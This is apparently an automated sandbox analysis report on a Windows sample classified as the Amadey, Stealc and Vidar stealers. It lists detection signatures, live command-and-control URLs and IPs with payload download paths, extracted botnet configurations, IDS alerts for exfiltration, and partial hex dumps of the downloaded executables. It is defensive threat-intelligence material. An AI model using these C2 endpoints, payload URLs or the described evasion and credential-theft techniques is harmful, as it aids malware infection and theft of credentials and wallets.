Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1519428
MD5: cb7db89596c4ae29f10dd521367f6f78
SHA1: 44bbf4567ce92e2c73090c33390a1236536c5562
SHA256: 2a9497fa328b4ada00d0dc10dcf521b5e0a52bf4d63a6c8e886df37d6d180669
Tags: exeuser-Bitsight
Infos:

Detection

Amadey, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: http://185.215.113.37/ Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpOC Avira URL Cloud: Label: malware
Source: http://185.215.113.37/P Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/softokn3.dllkSI Avira URL Cloud: Label: malware
Source: http://185.215.113.16/lfons Avira URL Cloud: Label: phishing
Source: http://185.215.113.103/steam/random.exec7cf1s Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpy- Avira URL Cloud: Label: malware
Source: http://185.215.113.16/ons Avira URL Cloud: Label: phishing
Source: http://185.215.113.37/0d60be0de163924d/softokn3.dlluSG Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Jo89Ku7d/index.phpncodedr Avira URL Cloud: Label: phishing
Source: http://185.215.113.103/steam/random.exeJ Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dll Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php.C Avira URL Cloud: Label: malware
Source: http://185.215.113.37 Avira URL Cloud: Label: malware
Source: http://185.215.113.103/steam/random.exe Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/mozglue.dll Avira URL Cloud: Label: malware
Source: http://185.215.113.16/ta Avira URL Cloud: Label: phishing
Source: http://185.215.113.37/e2b1563c6670f193.phpm Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php Avira URL Cloud: Label: phishing
Source: http://185.215.113.37/e2b1563c6670f193.phpl Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpr Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/mozglue.dll?S= Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Jo89Ku7d/index.php_9 Avira URL Cloud: Label: phishing
Source: http://185.215.113.37/0d60be0de163924d/msvcp140.dllqlC Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpo Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/softokn3.dll Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phplf Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/freebl3.dll Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phption: Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpc6L Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Jo89Ku7d/index.phpded Avira URL Cloud: Label: phishing
Source: http://185.215.113.37/t Avira URL Cloud: Label: malware
Source: http://185.215.113.16/l Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.phpncoded Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.php4 Avira URL Cloud: Label: phishing
Source: http://185.215.113.37/e2b1563c6670f193.phpa Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Jo89Ku7d/index.php;: Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.phpm Avira URL Cloud: Label: phishing
Source: http://185.215.113.37/e2b1563c6670f193.php Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpV Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php20N Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/sqlite3.dll Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpQ Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpinomi Avira URL Cloud: Label: malware
Source: http://185.215.113.37/ws Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php3d- Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpW Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/msvcp140.dll Avira URL Cloud: Label: malware
Source: http://185.215.113.16/f49fa1f45a5fea9f5c7cf18216e50adc2bcce2a7e12df9b2e8b2446fe1e92871NQ Avira URL Cloud: Label: phishing
Source: http://185.215.113.37/0d60be0de163924d/sqlite3.dllMlo Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Jo89Ku7d/index.phpT Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/f49fa1f45a5fea9f5c7cf18216e50adc2bcce2a7e12df9b2e8b2446fe1e928766ada# Avira URL Cloud: Label: phishing
Source: http://185.215.113.37/0d60be0de163924d/vcruntime140.dllHC Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Jo89Ku7d/index.php Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/ Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/age.Streams.DataWriterQ Avira URL Cloud: Label: phishing
Source: http://185.215.113.37/? Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpZ? Avira URL Cloud: Label: malware
Source: http://185.215.113.37/%? Avira URL Cloud: Label: malware
Source: http://185.215.113.37/B Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpES Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Jo89Ku7d/index.php5001 Avira URL Cloud: Label: phishing
Source: http://185.215.113.103/mine/random.exe Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpwser Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpF? Avira URL Cloud: Label: malware
Source: http://185.215.113.16/ows Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/216e50adc2bcce2a7e12df9b2e8b2446fe1e928766ada# Avira URL Cloud: Label: phishing
Source: http://185.215.113.37/e2b1563c6670f193.phpS6 Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Jo89Ku7d/index.phpr Avira URL Cloud: Label: phishing
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1000023001\951fa0b99a.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 0000000E.00000003.3040094573.00000000049A0000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 15.2.4065fbc12b.exe.8e0000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
Source: 15.2.4065fbc12b.exe.8e0000.0.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000023001\951fa0b99a.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000355001\4d1c7345ec.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C296C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 8_2_6C296C80
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C3EA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 8_2_6C3EA9A0
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C3B4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free, 8_2_6C3B4420
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C3E4440 PK11_PrivDecrypt, 8_2_6C3E4440
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C3E44C0 PK11_PubEncrypt, 8_2_6C3E44C0
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C4325B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt, 8_2_6C4325B0
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C3C8670 PK11_ExportEncryptedPrivKeyInfo, 8_2_6C3C8670
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C3EA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext, 8_2_6C3EA650
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C3CE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free, 8_2_6C3CE6E0
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C40A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError, 8_2_6C40A730
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C410180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util, 8_2_6C410180
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C3E43B0 PK11_PubEncryptPKCS1,PR_SetError, 8_2_6C3E43B0
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe Code function: 8_2_6C407C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util, 8_2_6C407C00
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: mozglue.pdbP source: 4065fbc12b.exe, 00000008.00000002.3005510475.000000006C2FD000.00000002.00000001.01000000.0000000D.sdmp, mozglue.dll.8.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.8.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.8.dr
Source: Binary string: nss3.pdb@ source: 4065fbc12b.exe, 00000008.00000002.3005843048.000000006C4BF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.8.dr, nss3[1].dll.8.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.8.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.8.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.8.dr
Source: Binary string: nss3.pdb source: 4065fbc12b.exe, 00000008.00000002.3005843048.000000006C4BF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.8.dr, nss3[1].dll.8.dr
Source: Binary string: mozglue.pdb source: 4065fbc12b.exe, 00000008.00000002.3005510475.000000006C2FD000.00000002.00000001.01000000.0000000D.sdmp, mozglue.dll.8.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.8.dr
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000354001\4065fbc12b.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49712 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49714 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49716 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:49716 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.37:80 -> 192.168.2.5:49716
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:49716 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.37:80 -> 192.168.2.5:49716
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.16:80 -> 192.168.2.5:49712
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49717 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:49716 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49734 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49744 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49768 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:49763
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor IPs: 185.215.113.43
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Sep 2024 12:35:05 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 26 Sep 2024 12:34:49 GMTETag: "1b6400-62304f6e7eac0"Accept-Ranges: bytesContent-Length: 1795072Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 2f ba f1 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 b0 67 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 e0 67 00 00 04 00 00 40 41 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 28 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 7a 71 67 69 76 66 78 00 10 19 00 00 90 4e 00 00 02 19 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 70 65 78 79 69 68 72 00 10 00 00 00 a0 67 00 00 04 00 00 00 3e 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 67 00 00 22 00 00 00 42 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Sep 2024 12:35:08 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 26 Sep 2024 12:13:16 GMTETag: "1d4400-62304a9d37d9a"Accept-Ranges: bytesContent-Length: 1917952Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 50 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 